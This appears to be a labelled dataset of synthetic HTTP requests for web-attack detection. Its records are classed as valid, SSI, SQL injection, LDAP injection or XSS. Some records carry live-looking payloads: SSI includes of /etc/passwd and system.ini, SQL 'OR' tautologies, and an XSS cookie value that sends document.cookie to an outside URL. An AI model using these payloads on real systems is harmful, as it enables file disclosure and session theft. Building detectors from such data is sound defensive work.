GET /iRyxhbudKnvxmlEPP/eni/skTeL6vz/19SYLnfoo4/pNn5903/ewehoumgyl/fkXuKjd8YpQ_@6nY/aiyaegt22reb4ttei7h.tiff?zinaeAohnwel=53185651&lH3PlTNHu=eAT5Ii311ta2&Y4QqAB-PMhF@=ifkomZj&-Be1KXAUn=1752&ieutTgt=Doens5&f0m=be&rzfititz=2063&cerItcdTaqehc=sOJ31b&lrdg29=passwd%3B93nd%3E%28+tz+reErhh&rhaeoa=18&wfKSeEmbK=kyo%2Fennzsnesby&h4o6ilatrprdfun=sv%3Ejui2%28z%2Birpt HTTP/1.1
Host: 138.241.132.1
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-9;q=0.7, hz-gb-2312, cp-932, x-mac-chinesetrad, iso-10646-ucs-2;q=0.4
Accept-Encoding: 
Accept-Language: tne-heca;q=0.1, iqx-Brt2st;q=0.7, Au-9flct5ee, ttee-ycnGoo
Cache-Control: no-transform
Client-ip: 227.133.53.190
Cookie: iecoui=71201;zt8oacLxbIh=ri;qOreplaceJ5kUPMRcK=370;sxahtlsp0aeocsn=70808
Cookie2: $Version="81"
Date: Fri, 25 Dec 09 12:56:58 CET
ETag: "fUrmoEcADl1vOphaKG8T"
Expect: 100-continue
From: R4kbi1mn@laxnje.st
If-Modified-Since: Tue, 19 May 09 13:39:16 GMT
If-Unmodified-Since: Sat, 09 Apr 05 09:39:53 UTC
If-Match: *
If-None-Match: "6z.U.YPhv1iJ1EWm1BaX"
If-Range: *
Max-Forwards: 7
MIME-Version: 1.7
Pragma: 6Te='ns'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM YXNyc2FjWXNndG51Y3B5dTd0dzl1N3RzMnI5ZW5yY3VwdG1ic2N1aQ==
Range: 39509-,-41,-519051
Referer: http://www.szejatw.gov/hoio1/s8jnna/eImi02n/nptenfrw/AqunraR.png
TE: chunked;q=0.0
Trailer: Trailer
User-Agent: sl4cguntbSn
UA-CPU: Sparc
UA-Disp: 564,067,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8973x257
Via: 3.0 www.onnbcD.htm
Transfer-Encoding: identity
Upgrade: src/0.7
Warning: 473 www.arroi44e.png "m5ao1xhonpTIDgipma3b" 
X-Forwarded-For: 236.247.161.119
X-Serial-Number: 33104741
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25670
Start - Id: 40419
class: SSI
PUT /jtet7tt3o5e/TiukaeeAn.mdb? HTTP/1.0
Content-Length: 243
Content-Language: 4drtG96s,rstucft
Content-Encoding: compress
Content-Location: http://www.suaJzsf.biz/iisinu.php3
Content-MD5: YWROaW5Jc2lrd2U4ZzIycg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Nov 07 05:03:36 GMT
Last-Modified: Thu, 08 Jul 04 09:52:59 UTC
Host: 10.41.245.122
Connection: tafe
Accept: image/gif;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 53.36.147.11
Cookie: w7qNDlach4=e9mhst;ssdfDvhnei=vbscriptahnPutsmt]0dos
Cookie2: $Version="57"
Date: Fri, 31 Mar 06 20:10:22 CET
ETag: W/".m@VDwteYf4x4358G1Y"
Expect: 100-continue
From: rQkb4al@ootSiafmsu.cz
If-Modified-Since: Mon, 20 Mar 06 22:33:06 CET
If-Unmodified-Since: Fri, 28 Dec 07 09:28:04 CET
If-Match: "_IXbohTjh6.QtTcuf61"
If-None-Match: *
If-Range: *
Max-Forwards: 80
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: datl 7ziWgict=Jnpued
Authorization: Basic ekRpYTpuaGNwY3J4cw==
Range: -687,0114-940064
Referer: /deoGhf/thwBle1u.asmx
TE: trailers
Trailer: Accept-Encoding
User-Agent: 0rrastrezwjom5ah4c
UA-CPU: StrongARM
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 808x844
Via: 0.3 158.158.244.222
Transfer-Encoding: gzip
Upgrade: ufb/8.5, d45i3/7.9
Warning: 538 222.86.10.146 "Etlso9Shinasieza" "Sun, 13 Jul 08 18:44:23 CET"
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 752812254452033186
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1gsock_streamuHq1=5116636609&HandT8MQstyleJLZ=ezCR7&245sghtaccesX8window.open=064&bdpotndtot=nh+dtvh  t&hyrdu=e =i4t@fr&d9rEeniZS=<!--     #include     virtual="c:\winnt\system.ini"-->&ylAdIgscp0hjs=herrnLsdinrtocfors

End - Id: 40419
Start - Id: 37045
class: LdapInjection
GET /d3WT/iZKuaB6TW2PN39SA/PY7mailVxdvJstyleJL12/i@a4t/lmd/izoISTDglDwXt3/aheesrzswniSmk/se/fJ6TiBJ657KCe_nj5/cai/pQscriptScexecKyoA.js?asnknr=qum&eanteOurh=8991702419&tNdenhroqmEa7o=AtRolequow1&l4e3dbdo=rpeeteiq++Nttbetween%3Drfor&h2=xc&anEso3=oa%24y%27&0g9eeSi=6173553425&olt99qbTVwhere=%29+++%28+%7C++%28xrh%3DevI7u*%29&1BV5f=oBuNWhToeliet&ula=+tt%5Bdaah5echoSaeulb&ypjoe=gHnsY HTTP/1.0
Host: www.enstdes0n.cz
Connection: ltnl
Accept: application/*;q=0.8
Accept-Charset: koi8-r;q=0.3, utf-7;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 188.212.178.172
Cookie: 6roossd=52482
Cookie2: $Version="4"
Date: Sun, 12 Nov 06 08:27:47 CET
ETag: "Dpb8_1olE.nLz3YRQbPu"
Expect: kodtt
From: tJpe@htd4aess.biz
If-Modified-Since: Tue, 05 Oct 04 14:04:18 UTC
If-Unmodified-Since: Tue, 27 Jan 09 16:23:36 CET
If-Match: *
If-None-Match: "jfyHLU6IO4Nk2Rqe"
If-Range: "nFLIjUeH7XGYUQ1pvTi"
Max-Forwards: 361
MIME-Version: 3.6
Pragma: ac='szbrArde'
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: Basic ZHR0THRsOnIxeTNlcg==
Range: -742236,5-8909,-634
Referer: http://tNeeI.biz/sflb/gloeig.wav
TE: chunked,deflate
Trailer: Date
User-Agent: Mozilla/0.6 (compatible; MSIE 3.3; Windows NT; ac5ehonuun; Saaeh)
UA-CPU: 68000
UA-Disp: 370,042,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: HTTP/5.5 www.llah.jpeg, ebnoa/2.0 www.4cmh.jpeg, HTTP/8.8 www.oiFP.html:37688
Transfer-Encoding: gzip
Upgrade: nopuat/4.5
Warning: 055 85.124.104.165 "iraNbtdtn5hudtyn" 
X-Forwarded-For: 143.102.250.73
X-Serial-Number: 595061014884085769
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37045
Start - Id: 41417
class: SqlInjection
POST /Eaesa9nifc7qseIe/wIam/ryLqj9sRK/ut/oDuCrR/erWut4/bsduqIpOrrnmogtse1di/select1/iroaDnesrdn/FMG1dP6Y5DZE1/thjLE_Ii7rqUCIB_ArHT.php4? HTTP/1.0
Content-Length: 260
Content-Language: ado,4rs,dTihfsnd
Content-Encoding: compress
Content-Location: http://tceIpN8o.fr/fd0ds/lamdNi/axcaDs9.swf
Content-MD5: ZGdhcWwzdGhlaDdvb3NvUw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 Jan 08 02:24:20 CET
Last-Modified: Thu, 31 Aug 06 12:53:31 CET
Host: www.uaunuHe.cz
Connection: close
Accept: application/zip;q=0.6, audio/basic;q=0.2
Accept-Charset: koi8-r;q=0.3, euc-tw;q=0.8, windows-1252;q=0.3, x-mac-hebrew;q=0.9, x-mac-greek;q=0.2
Accept-Encoding: *;q=0.2
Accept-Language: e-gnoion;q=0.3, sfhs3ohg-rGoaae;q=0.1, a7tN-eb
Cache-Control: max-age=87
Client-ip: 180.8.150.200
Cookie: rm9djuteoeatt=nAnr3xc;iih65rwyttTy=7ttrr|;ewgr=79873673;utmoimixr6dC6ts=r 3x;gtrSlyg=axvJH;idEa7Ia5dsaek=1830638
Cookie2: $Version="49"
Date: Sun, 17 Jul 05 21:47:15 CET
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: oghl
From: eznB@Adtctleba.uk
If-Modified-Since: Wed, 12 Nov 08 18:53:54 GMT
If-Unmodified-Since: Mon, 27 Dec 04 14:39:41 UTC
If-Match: "FTba.-n9fS1b70R"
If-None-Match: *
If-Range: Tue, 08 Sep 09 05:55:04 GMT
Max-Forwards: 34
MIME-Version: 2.2
Pragma: la=nkeDl
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: NTLM Z3RxbHNpYWhvU2FhZTFubEVuem1SMW5tdHRPb2VFZm9zdHRldXJlZmFFb2x0YWY=
Range: 4509-,62-022408,-4198
Referer: http://www.h7sdtee.cz/eintogea/8rcp/tyehtn/rnup/ggqers.gif
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: t5I1ac8 http://www.ae3eNmrf.biz
UA-CPU: MIPS
UA-Disp: 016,9117,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 738x118
Via: 1.4 www.thuScr.css:9, 9.7 0.189.119.128
Transfer-Encoding: identity
Upgrade: rht/5.4
Warning: 149 193.52.96.248 "8Xhauustfrrwxeheore" 
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 19164
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

vkDdngogths6uT=2652838&ss=ohhroinputee$&to&itNe20=6rhtpass&r0midruesi=2eawiUUPEnI&gealtEe=ees;phttpsytoEeel e&egnW=qwer'  or Be2a0_v.Account='iunsila@meS.com&cdpmEonvQ=6805&81veip34qTAwe=tf&29Yw=oa|&mpM_passwd=psnsihsercprmj&tro=T>0ao node(

End - Id: 41417
Start - Id: 35250
class: SqlInjection
GET /replacezFinclude@3/icomsehs4nurh/enunjon358azyen6at/i4aGavnwmreer/WNFX/aspinnypjt9y/Vii/0AMlink/rdUdln0.aspx?oa2W6=c+esrhE&9rImq08betweenYLtG=OrigText%27OR%27agH%27++%3D+++%27exI%27 HTTP/1.1
Host: www.t7eCiuhu.be:80
Connection: 2spl3
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: compress
Accept-Language: laThae-4i
Cache-Control: cyisn=Clzij
Client-ip: 150.203.233.233
Cookie: XSoMlEMNhc=69581;t2ernodltuout=hs;hsahinnrmpni=3660228295
Cookie2: $Version="9"
Date: Sat, 24 Jan 04 21:09:08 GMT
ETag: "uT847SjOiACrZoY"
Expect: 100-continue
From: ieogO97c@1xtO.uk
If-Modified-Since: Thu, 02 Apr 09 04:44:39 GMT
If-Unmodified-Since: Fri, 24 Nov 06 13:27:51 CET
If-Match: "o64x6zlvVa_jB03.F"
If-None-Match: "@EliaMfR4Js8iSZ"
If-Range: "jW@Rm9CmGNHcSfF"
Max-Forwards: 0
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM YWNudHlvZkF0dW1td0FzZWs0ZXJlbHNjc0NzNWVQbmxmZXNvdWVleW8=
Authorization: NTLM QTllc3RURWF0cm9zaWVlcmRyZXd1aWx0ZXJ0NEk2UTByaXhsSGFlZXJnZWlzb3Q=
Range: 686-87074
Referer: /1Tsni8/rhtv.exe
TE: gzip;q=0.6
Trailer: User-Agent
User-Agent: dqgs (72cSc28wKX; s5UwWAheTr; bsuK0K)
UA-CPU: 68000
UA-Disp: 052,8339,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7374x0863
Via: 2.8 165.220.150.159, 4.4 www.nnkm1.jpeg
Transfer-Encoding: deflate
Upgrade: Eot/0.6, Efs/4.3
Warning: 155 www.moac.shtml "35ronmeh9nhdee" 
X-Forwarded-For: 242.188.252.188
X-Serial-Number: 99658845770
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35250
Start - Id: 20634
class: Valid
GET /1gZoiPfFvlPUwIaF/sWc77xl8/egioionapiM61d5n/Sj3oaaesobhetaTS/CadminCY95like.css?httpsxvpK0._9BvB=3006&rwOonnl2=aDt.vu9Dj&tadayMisin=t%28b&iwrtoYneOeo=0&zHpX02N.RVK=doaoMriigasf&urhE=95732977&nodEpehctT=n+ibakmae%3Es&oleethlTte=istngiot HTTP/1.1
Host: 221.187.66.255
Connection: acbetldy
Accept: image/*;q=0.3, audio/x-wav
Accept-Charset: iso-8859-3, utf-7;q=0.4, iso-8859-1, iso-2022-jp
Accept-Encoding: 
Accept-Language: oni-j0uqeajs;q=0.6, boa-utes, Teesa8-ebshzna;q=0.9, deg5pah-rtnaae;q=0.3
Cache-Control: max-stale
Client-ip: 102.69.233.253
Cookie: aoa8swatouogoW=:|au
Cookie2: $Version="808"
Date: Sat, 11 Oct 08 12:35:20 UTC
ETag: W/"QQN@YXWgga92S2wdoJd"
Expect: zhcapaa=4SySOen;myedr=9rlpRete
From: hims9lO@pelsineh9.it
If-Modified-Since: Wed, 21 Nov 07 05:59:10 GMT
If-Unmodified-Since: Fri, 02 Oct 09 09:47:33 GMT
If-Match: "nYAEr32hViLib2CDiR5k"
If-None-Match: "KrK8vAczY7Qq5I_h21B"
If-Range: Thu, 15 Jan 04 13:31:23 UTC
Max-Forwards: 878
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: sRah gaho=eeosctBp
Authorization: Digest realm
Range: 30982-
Referer: http://www.saaVisoo.org/snusRrw/zrib/1tJrordp.pl
TE: deflate;q=0.6
Trailer: Date
User-Agent: fxXhE1@tn http://www.scngi.net
UA-CPU: 68000
UA-Disp: 568,9579,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3710x9582
Via: HTTP/7.1 www.uedgeTe.shtml
Transfer-Encoding: compress
Upgrade: lka/1.6
Warning: 860 www.Pz9Tes.png "csrehlretdegSt" "Wed, 24 Jun 09 06:42:44 UTC"
X-Forwarded-For: 240.52.92.34
X-Serial-Number: 999844116491308
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20634
Start - Id: 46713
class: XSS
GET /sTtF2mK.GjQpNO3/hBOK/gxXt.Dpr.P/havingO2.wKls.mspx?T.sBqoln=43708401&orr7to=1607808&Teu=ka%3EnWoar&waxnhms=sXRxf&oDu=n8O+&ikO9qs8eeySmnd=i%7Co0feao%3Dahu%3A4&ieaeso98xee5e=98633831&t1ruooLtw=0399986&Ppsipanbi=bodyH+l%29&yeaqgRcgstrr=einathDtnoecs&otieisrat0r0i=agR&lraei5=p0lY7&2QLyR=4807&5fouiorq4cIcrdn=9266936&mshktdtlar=ca%40h4access_logXUand7+c%3E HTTP/1.0
Host: 70.31.118.143
Connection: ecwe
Accept: video/*;q=0.5, audio/x-wav
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=43274
Client-ip: 175.173.101.1
Cookie: afO=<input   type =  "image"   dynsrc =  "    javascript:  [document.location.replace('http://www.ngal.com/cgi-bin/tiseasonti.cgi'+document.cookie);]   "   >
Cookie2: $Version="822"
Date: Wed, 21 Dec 05 14:39:12 CET
ETag: W/"wwj5LsWRDOyemLX"
Expect: hceqis
From: gpA9s@9eee.biz
If-Modified-Since: Mon, 01 Jan 07 09:35:45 UTC
If-Unmodified-Since: Fri, 01 Sep 06 23:25:21 GMT
If-Match: *
If-None-Match: *
If-Range: "zvwEbyp2kV6a.D8TuON"
Max-Forwards: 0
MIME-Version: 2.2
Pragma: utnbCysF=nw
Proxy-Authorization: NTLM cnVpaWVhNG1kaWl2aTJ0bWQ4QW1uNmxiYzZkN3Q5Qm53dHRuczhvdExyc2k=
Authorization: Basic dWhMdHlhOm9hMmFy
Range: 6-,-0,462-197
Referer: /rLakoabt/rjys3q/eonio/htYcsh/Lrri.rar
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/8.1 (Machintosh; U; PPC Mac OS X 8.8; r2-ta; rv:5.2.6) Gecko/76265478
UA-CPU: x86
UA-Disp: 7583,8873,32
UA-Pixels: 622x110
Via: 8.8 www.E4c8t.png, 8.8 www.1tt468.html
Transfer-Encoding: compress
Upgrade: ra3OHS/2.4, t7nn2/8.3, est6nG/7.7, hniHdr/8.1
Warning: 351 219.37.216.100 "ohhyget8" 
X-Forwarded-For: 131.100.225.97
X-Serial-Number: 348730279
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 46713
Start - Id: 40611
class: SSI
GET /htctnnm8/ps0l/rMU-PPOJvtk.La051b/tvZWQWpKG6us8L/dneeEthhahottxa/9lriroragCoi/aw/ivbIWksR/oOpc/9Z/-PPexecnRJopen-08s/1.iofSD-9Z@.php4?teeoeuQl1rauh6=%3C%21--+++++%23include++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++++--%3E&mAtgud0iswvrDav=access_logdrT&ftssrou97jn8Pht=hik%2B&VRDX=mTi7anisllhlgnttts&whetherr=9832515327&smhntRitariru=14590 HTTP/1.1
Host: www.t1eeiEch8w.cz:7472
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: obn-ad, ghweh6-tt, tt-eHfe9ei;q=0.9, oea-enhinnsg;q=0.4
Cache-Control: max-stale
Client-ip: 173.40.38.255
Cookie: ayfgr2iia8ho=1dzaTCy9Kl3j;ioidvakeePdtiwa=0115496;iWedka11etco8=ct;Ueauhshwienae=n@tZm3S6V;oajeqgreqit=538471
Cookie2: $Version="252"
Date: Fri, 01 Aug 08 10:45:49 GMT
ETag: "GwJ5.ecb9U1xVkZx"
Expect: 100-continue
From: mObarai@oDeniipebe.it
If-Modified-Since: Tue, 24 Apr 07 18:59:11 CET
If-Unmodified-Since: Sat, 17 Sep 05 24:23:05 CET
If-Match: "D11xxMOuagBnAt8sG"
If-None-Match: "xB.mFMzIfPhTff-"
If-Range: "8pQHSr.DftHvE8F1MEM"
Max-Forwards: 774
MIME-Version: 5.8
Pragma: ombelh=iuttgs7e
Proxy-Authorization: NTLM c29ZbHRmc2poZ3RadG5ocG5jb2Nuc3RpaXJMRW9hdGM=
Authorization: Digest username="ednha"
Range: -916,8-,-198241
Referer: /a3hNuh3l/9ti7x/etmg1/G6epta/icnncK.htm
TE: trailers,gzip,deflate;q=0.1
Trailer: Expect
User-Agent: hnips87ersceCOa
UA-CPU: PowerPC
UA-Disp: 116,2183,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7337x662
Via: 5.0 195.165.85.89, FTP/9.9 155.176.128.142
Transfer-Encoding: y7tA
Upgrade: duee/7.7
Warning: 019 www.tets.js "ceeeeeeaeEIqAenbihtM" "Sun, 21 Mar 04 14:54:34 CET"
X-Forwarded-For: 5.3.246.86
X-Serial-Number: 0848613920149750
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40611
Start - Id: 30775
class: Valid
GET /EeyOn/wesgr8gRtiodi.htm? HTTP/1.0
Host: www.oecRuwc.ch
Connection: close
Accept: */*
Accept-Charset: windows-1255;q=0.5, koi8, x-mac-icelandic, utf-8, gb2312
Accept-Encoding: deflate, compress, deflate, identity, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 133.68.47.240
Cookie: chg=kte;UBllcO=x
Cookie2: $Version="0"
Date: Fri, 07 Dec 07 15:24:01 UTC
ETag: "McB7QTkO01IVs_mr4Zs-"
Expect: dhOtrocf=8trheo;f7rimsn
From: dzpsof6@gehphe0eb.biz
If-Modified-Since: Thu, 12 Nov 09 11:57:04 GMT
If-Unmodified-Since: Sun, 12 Aug 07 03:33:08 CET
If-Match: *
If-None-Match: "qG-LSZgJ.7wPv_cdKl"
If-Range: "m0y6SwF6IGMb1BC"
Max-Forwards: 136
MIME-Version: 4.3
Pragma: em='adalf3qr'
Proxy-Authorization: ieatc4 rnrbw=hcadA
Authorization: Digest nc=472a15C2
Range: -1,974962-,286481-504589
Referer: /pscSenwn/ineaeams/Htxd/Qmji/idEeai.cfm
TE: trailers,chunked;q=0.5,trailers
Trailer: If-Match
User-Agent: Mozilla/6.6 (compatible; MSIE 1.7; Mac OS X; ehteuhaca; ioeda9e67)
UA-CPU: 68000
UA-Disp: 744,1924,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 9905x3128
Via: FTP/8.4 www.gnowle5t.htm
Transfer-Encoding: weNi
Upgrade: uIT/1.8, hdv/9.8
Warning: 732 112.144.58.134 "HhNnuq" 
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 1320262556733301
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30775
Start - Id: 5840
class: Valid
POST /nP1y-uL20n@L3RynhVe-/atcwyotdmem5le/VSByYyu2R@s/tzllr3Hqhnehs/eprnhcaos.nsf? HTTP/1.1
Content-Length: 161
Content-Language: moaeo,ejz
Content-Encoding: gzip
Content-Location: http://www.soaeirwj.ch/eaemdr/5ohs8ta/trRw/DLtautfp/tntbds2.jpeg
Content-MD5: aGlyZm9yQXRlU3dpYTBldA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 24 Jan 08 06:09:37 CET
Last-Modified: Wed, 25 Feb 09 22:52:09 GMT
Host: 42.221.95.83
Connection: keep-alive
Accept: */*
Accept-Charset: utf-7
Accept-Encoding: gzip, identity, compress, compress
Accept-Language: egziaeD-Heerkwl;q=0.4, lohw-tnipvilh, 5rzdeabi-po;q=0.8, 1rte-dey, mdtwr4-hrab
Cache-Control: only-if-cached
Client-ip: 127.171.94.127
Cookie: sTna5Tlcarr=linkjU8t8:ohrCghrbeao;enO4rlteh=epLc;SrnullVlog=156;60l2EkbXJ=oitatsshcashrK9i;u8as1A=30739;rrvlg1nro=491
Cookie2: $Version="141"
Date: Fri, 28 May 04 10:49:20 UTC
ETag: W/"4xTR0hwI4@WsOot@zvMm"
Expect: ahrut5sh=ahsanhca;l4v5A
From: sePnirh@e4qne.de
If-Modified-Since: Sun, 15 Aug 04 15:57:31 GMT
If-Unmodified-Since: Thu, 24 Apr 08 17:50:42 GMT
If-Match: *
If-None-Match: "8UbUHydHktmNpkISvj"
If-Range: "QaMj@8TzuK-SrmIiSM"
Max-Forwards: 404
MIME-Version: 8.7
Pragma: a=agDazhx
Proxy-Authorization: NTLM dHdzcGVzcnZudGhiTmhlbXRkaGZkZXJvOXBrMGhjZXN1MmFyaHRubm8=
Authorization: Basic czFwdHRkczplY3ZpZQ==
Range: 4-,812-694413
Referer: http://ywsyseg.it/aet1p/anSl0f/wfIxioo/rkahf/OaThktS.php4
TE: trailers,deflate;q=0.0,deflate
Trailer: Range
User-Agent: seasizm (3kAvaCK; 1AVJoej4; f9JUqp6hX)
UA-CPU: 68000
UA-Disp: 746,1087,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3215x099
Via: FTP/6.9 www.msent.tiff:4322, 0.5 78.223.25.213, 7.0 88.151.48.109
Transfer-Encoding: deflate
Upgrade: e4c/1.1, hhpf/8.4, n1mot/3.4, n6dla/3.5
Warning: 161 210.131.126.108 "bzrjUioaiertes" "Tue, 24 Jun 08 01:01:36 GMT"
X-Forwarded-For: 10.142.82.192
X-Serial-Number: 8692230651
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

senesnja9erea=97187483&ntrd=875&iletluar8=dx7eiizb=evalclz&suiEa3=s~idenullasAiln0&5oesme=13533834&12k2Mb4=p90crsur+thomestin&hsoo=iE iobjectaenescripti4zP

End - Id: 5840
Start - Id: 27768
class: Valid
GET /tcF6UTmCn1/kVk@hc_geM_OYBpo/eTtka9PI5e6V6C/Cy7qhYN@LstyleZ9/iNjptRw/m0aldJtLo0ut0g/TeQn/t_b4yFhqAKtoKBcN/7u/1R-NQAu7ycwCNpoeX.tiff? HTTP/1.0
Host: 88.77.63.44
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=31503
Client-ip: 82.130.43.162
Cookie: irfeeqoseno=7;dtilIHoxce=76269;mPtstxuduee=cat-;Jz7tCq=p1xpvhX.FW;Nrg8k87e=lcmdaiaoe 
Cookie2: $Version="75"
Date: Sat, 09 Oct 04 18:03:40 CET
ETag: "WG9tAJhw@_sxd-8z"
Expect: latp
From: dato@TTn9tsud.org
If-Modified-Since: Sat, 10 Apr 10 16:57:13 CET
If-Unmodified-Since: Fri, 02 Apr 10 15:17:45 UTC
If-Match: "dTZ7kuryoiXTrShN0PZ"
If-None-Match: "NASCKMhbP_BBYaSJhS7"
If-Range: Sun, 17 Dec 06 03:18:07 CET
Max-Forwards: 675
MIME-Version: 2.1
Pragma: 9rR='aolso'
Proxy-Authorization: NTLM YWFlbHNueWNyZ0lpd2VhdXd1ZTF0MWVpN2FURXdyenVl
Authorization: eadbm edgaiSl=82un0
Range: 360141-,-759683
Referer: /if2p/xidoui.php4
TE: deflate;q=0.4,chunked,trailers
Trailer: Host
User-Agent: Mozilla/6.2 (Machintosh; U; PPC Mac OS X 1.4; t1-dw; rv:3.6.1) Gecko/67511310
UA-CPU: x86
UA-Disp: 158,739,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 483x5740
Via: 6.5 www.hfo0.html
Transfer-Encoding: compress
Upgrade: 1rlep/6.3, u1yj/7.3, t27l/3.0, tnl/6.0, ki1jp/1.2
Warning: 643 114.204.41.96 "onreoj3eneols3hnaj" "Tue, 25 May 04 07:31:58 UTC"
X-Forwarded-For: 213.115.160.45
X-Serial-Number: 256698379
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27768
Start - Id: 39612
class: SSI
GET /atahirxegIgoLuiotq/or9taoeneehTm9h1d.shtml?0sxS5ndsepaic=zYUDyZypz&null1nZCy_9jXH@=%3C%21--++++%23include+virtual%3D%22%2Fetc%2Fpasswd%22++--%3E&yZs95N=5344&Xdchd3emateha=5sec34nYisedia&8sfiEi=3263796 HTTP/1.0
Host: 127.187.129.166:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: windows-1253, iso-8859-1;q=0.7, x-mac-greek;q=0.0
Accept-Encoding: gzip, identity;q=0.8
Accept-Language: irec-mlietre;q=0.1, tntt-nqve, asaEnh5-ESrsessd;q=0.4, 96i-bjr, 3sgn5r-ba7j
Cache-Control: no-store
Client-ip: 122.211.18.203
Cookie: Ii5hrihaa=j;a8d=%>;F9albaer2naaLte=65991643
Cookie2: $Version="8"
Date: Sat, 17 Jan 09 03:48:13 UTC
ETag: "uJ3lTX1kx4DMc.p"
Expect: 100-continue
From: ts3vhh@kqzfn.com
If-Modified-Since: Tue, 17 Jul 07 04:04:30 CET
If-Unmodified-Since: Fri, 18 May 07 20:11:32 UTC
If-Match: *
If-None-Match: *
If-Range: "08my99QpmNFuY_JTS2"
Max-Forwards: 2060
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: yn3o7 beia=nuSE
Authorization: Digest qop=uncT
Range: 973-,-4,32221-
Referer: /omntHl/fgettse4/od5t/sfci.conf
TE: trailers,deflate,trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.1 (Windows; U; Win 9x 5.2; rr-sb; rv:9.3.0) Gecko/88587707
UA-CPU: PowerPC
UA-Disp: 7767,487,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1841x260
Via: d2miyr/5.8 www.d0i3piEl.jpg, ldhnVo/8.5 220.160.63.121:47762
Transfer-Encoding: chiahw
Upgrade: i4uts/0.2, aesNA/6.1
Warning: 025 www.keet.tiff "mDUtinismbsS" "Thu, 13 May 04 10:01:27 GMT"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 224017819
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39612
Start - Id: 11075
class: Valid
GET /ca6d/9cUR038/aPItab7ZE9qOEqaK.dll?8LG05H=953512534&ccuduct9Dmt=Wfmhn&atBcmtlNo=587503&hs24=ybW&euhzse=560683&6t=w3C0evsunFec&tRaasbeclleFr=rte&ardXo10F=hasstwaa7a%3Bdt&or=925&ot=nsNeoamad7se&patq01onsiWnaMt=fNEU&je22n7hSqf7hDn6=tf1&tae22rh6ppLiTey=1143&idE8d=homeei&JPZ75t=98 HTTP/1.0
Host: 181.163.159.169:7654
Connection: keep-alive
Accept: video/*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.6
Accept-Language: w-ztewwprl, nacuJre6-ec3Nn;q=0.0
Cache-Control: no-transform
Client-ip: 214.74.209.201
Cookie: zndDsoeeoacw=~ss[nlsA:zg(d
Cookie2: $Version="39"
Date: Tue, 24 May 05 03:52:57 GMT
ETag: "LHFQXTS-rxzVKatC"
Expect: 100-continue
From: irc6ruhx@rhorr.ch
If-Modified-Since: Fri, 10 Nov 06 01:06:52 UTC
If-Unmodified-Since: Sat, 30 Jun 07 14:05:43 GMT
If-Match: *
If-None-Match: *
If-Range: "CioPEEvGHs6.LA6_WP0Z"
Max-Forwards: 7322
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest nonce
Range: 240-
Referer: http://www.cdxeC4n.cz/bi5g7/bmsiA/nfkm6o.tar
TE: trailers,deflate,chunked;q=0.3
Trailer: Via
